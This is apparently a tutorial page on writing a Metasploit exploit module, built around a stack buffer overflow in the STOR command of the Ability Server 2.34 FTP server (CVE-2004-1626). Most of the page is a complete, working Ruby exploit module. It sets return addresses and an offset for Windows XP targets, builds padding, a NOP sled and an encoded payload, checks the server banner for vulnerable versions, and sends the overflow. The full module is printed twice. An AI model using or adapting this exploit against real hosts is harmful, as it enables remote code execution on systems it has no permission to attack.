Exploit module

Remote Exploit

FTP exploit

Our example will be a very simple vulnerable FTP server called ability server.

What do we want?

  • Create Exploit module
  • Exploit FTP Server
  • Set exploit rank
  • Describe The module
  • Let people know we created this module
  • Add references about the vulnerability that we exploit
  • Choose a default payload
  • Set the Bad characters.
  • Set Disclosure Date
  • Targets and it’s return address (EIP offset)
  • Options to set the target IP, port. Also username and password if required.
  • Check the target if vulnerable.
  • Send the exploit
  • Check if the module has been written correctly (msftidy.rb)

Steps

  • Create Exploit module
  • Exploit FTP Server
  • Put a rank for the module
  1. ##
  2. # This module requires Metasploit: http://www.metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. require 'msf/core'
  6. ### Module Type ###
  7. class Metasploit3 < Msf::Exploit::Remote
  8. Rank = NormalRanking
  9. include Msf::Exploit::Remote::Ftp
  • Describe The module
  • Let people know we created this module
  • Add references about the vulnerability that we exploit
  • Choose a default payload
  • Set the Bad characters.
  • Set Disclosure Date
  • Targets and it’s return address (EIP offset)
  • Options to set the target IP, port. Also username and password if required.
  1. def initialize(info = {})
  2. super(update_info(
  3. info,
  4. 'Name' => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',
  5. 'Description' => %q{
  6. This module exploits a stack-based buffer overflow in Ability Server 2.34.
  7. Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,
  8. which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.
  9. The vulnerability has been confirmed on version 2.34 and has also been reported
  10. in version 2.25 and 2.32. Other versions may also be affected.},
  11. 'License' => MSF_LICENSE,
  12. 'Author' =>
  13. [
  14. 'muts', # Initial discovery
  15. 'Dark Eagle', # same as muts
  16. 'Peter Osterberg', # Metasploit
  17. 'Ruby (@Rubyfu)', # Just explain the module
  18. ],
  19. 'References' =>
  20. [
  21. [ 'CVE', '2004-1626' ],
  22. [ 'OSVDB', '11030'],
  23. [ 'EDB', '588'],
  24. ['URL', 'http://rubyfu.net'] # Just explain the module
  25. ],
  26. 'Platform' => %w{ win },
  27. 'Targets' =>
  28. [
  29. [
  30. 'Windows XP SP2 ENG',
  31. {
  32. #JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)
  33. 'Ret' => 0x73E32ECF,
  34. 'Offset' => 966
  35. }
  36. ],
  37. [
  38. 'Windows XP SP3 ENG',
  39. {
  40. #JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)
  41. 'Ret' => 0x7E429353,
  42. 'Offset' => 966
  43. }
  44. ],
  45. ],
  46. 'DefaultTarget' => 0,
  47. 'DisclosureDate' => 'Oct 22 2004'
  48. ))
  49. register_options(
  50. [
  51. Opt::RPORT(21),
  52. OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]),
  53. OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ])
  54. ], self.class)
  55. end
  • Check the target if vulnerable.
  1. def check
  2. connect
  3. disconnect
  4. if banner =~ /Ability Server 2\.34/
  5. return Exploit::CheckCode::Appears
  6. else
  7. if banner =~ /Ability Server/
  8. return Exploit::CheckCode::Detected
  9. end
  10. end
  11. return Exploit::CheckCode::Safe
  12. end
  • Send the exploit
  1. def exploit
  2. c = connect_login
  3. return if not c
  4. myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']
  5. # Take client IP address + FTP user lengths into account for EIP offset
  6. padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)
  7. junk = rand_text_alpha(padd_size)
  8. sploit = junk
  9. sploit << [target.ret].pack('V')
  10. sploit << make_nops(32)
  11. sploit << payload.encoded
  12. sploit << rand_text_alpha(sploit.length)
  13. send_cmd(['STOR', sploit], false)
  14. handler
  15. disconnect
  16. end

Wrapping up

  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
  5. require 'msf/core'
  6. class Metasploit3 < Msf::Exploit::Remote
  7. Rank = NormalRanking
  8. include Msf::Exploit::Remote::Ftp
  9. def initialize(info = {})
  10. super(update_info(
  11. info,
  12. 'Name' => 'Ability Server 2.34 STOR Command Stack Buffer Overflow',
  13. 'Description' => %q{
  14. This module exploits a stack-based buffer overflow in Ability Server 2.34.
  15. Ability Server fails to check input size when parsing 'STOR' and 'APPE' commands,
  16. which leads to a stack based buffer overflow. This plugin uses the 'STOR' command.
  17. The vulnerability has been confirmed on version 2.34 and has also been reported
  18. in version 2.25 and 2.32. Other versions may also be affected.},
  19. 'License' => MSF_LICENSE,
  20. 'Author' =>
  21. [
  22. 'muts', # Initial discovery
  23. 'Dark Eagle', # same as muts
  24. 'Peter Osterberg', # Metasploit
  25. 'Ruby (@Rubyfu)', # Just explain the module
  26. ],
  27. 'References' =>
  28. [
  29. [ 'CVE', '2004-1626' ],
  30. [ 'OSVDB', '11030'],
  31. [ 'EDB', '588'],
  32. ['URL', 'http://rubyfu.net'] # Just explain the module
  33. ],
  34. 'Platform' => %w{ win },
  35. 'Targets' =>
  36. [
  37. [
  38. 'Windows XP SP2 ENG',
  39. {
  40. #JMP ESP (MFC42.dll. Addr remains unchanged until a patched SP3)
  41. 'Ret' => 0x73E32ECF,
  42. 'Offset' => 966
  43. }
  44. ],
  45. [
  46. 'Windows XP SP3 ENG',
  47. {
  48. #JMP ESP (USER32.dll. Unchanged unpatched SP3 - fully patched)
  49. 'Ret' => 0x7E429353,
  50. 'Offset' => 966
  51. }
  52. ],
  53. ],
  54. 'DefaultTarget' => 0,
  55. 'DisclosureDate' => 'Oct 22 2004'
  56. ))
  57. register_options(
  58. [
  59. Opt::RPORT(21),
  60. OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]),
  61. OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ])
  62. ], self.class)
  63. end
  64. def check
  65. connect
  66. disconnect
  67. if banner =~ /Ability Server 2\.34/
  68. return Exploit::CheckCode::Appears
  69. else
  70. if banner =~ /Ability Server/
  71. return Exploit::CheckCode::Detected
  72. end
  73. end
  74. return Exploit::CheckCode::Safe
  75. end
  76. def exploit
  77. c = connect_login
  78. return if not c
  79. myhost = datastore['LHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['LHOST']
  80. # Take client IP address + FTP user lengths into account for EIP offset
  81. padd_size = target['Offset'] + (13 - myhost.length) + (3 - datastore['FTPUSER'].length)
  82. junk = rand_text_alpha(padd_size)
  83. sploit = junk
  84. sploit << [target.ret].pack('V')
  85. sploit << make_nops(32)
  86. sploit << payload.encoded
  87. sploit << rand_text_alpha(sploit.length)
  88. send_cmd(['STOR', sploit], false)
  89. handler
  90. disconnect
  91. end
  92. end
  • Check if the module has been written correctly (msftidy.rb)
  1. metasploit-framework/tools/dev/msftidy.rb ability_server_stor.rb